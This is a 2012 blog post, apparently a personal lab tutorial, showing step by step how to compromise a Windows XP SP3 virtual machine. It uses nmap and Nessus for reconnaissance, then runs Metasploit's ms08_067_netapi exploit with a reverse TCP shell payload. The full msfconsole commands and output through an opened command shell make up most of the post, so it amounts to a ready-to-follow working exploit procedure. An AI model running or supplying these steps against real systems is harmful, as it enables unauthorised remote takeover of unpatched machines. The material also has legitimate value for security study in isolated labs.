Friday 27 January 2012

Exploit Windows Xp Sp3 Using Mfconsole

the following is step by step to exploits windows xp sp3 in vitual box on backtrack using mfconsole, before exploits search information gathering using zenmap or nmap to find guest address and service enumeration on it. in my case IP Adress from window xp Sp3 is 192.168.43.2
next do vulnerability assesment using  nessus, following result have 2 vunerallbilty in level high.




ms09-001

ms08-067

after we know vulner of target, then exploits using msfconsole.
first run mfsconsole

set the target to exploit using command

msf > use exploit/windows/smb/ms08_067_netapi

set IP address target (windows xp)

msf  exploit(ms08_067_netapi) > set RHOST 192.168.43.2
 HOST => 192.168.43.2


set type payload to exploits

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp


set  IP Address our workstation

msf  exploit(ms08_067_netapi) > set LHOST 192.168.43.1
LHOST => 192.168.43.1


run to exploits

msf  exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.43.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.43.2
[*] Command shell session 1 opened (192.168.43.1:4444 -> 192.168.43.2:1041) at 2012-01-28 14:03:17 +0800

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



exploits success, we can handling windows xp sp3 from mfsconsole in bactrack.





No comments:

Post a Comment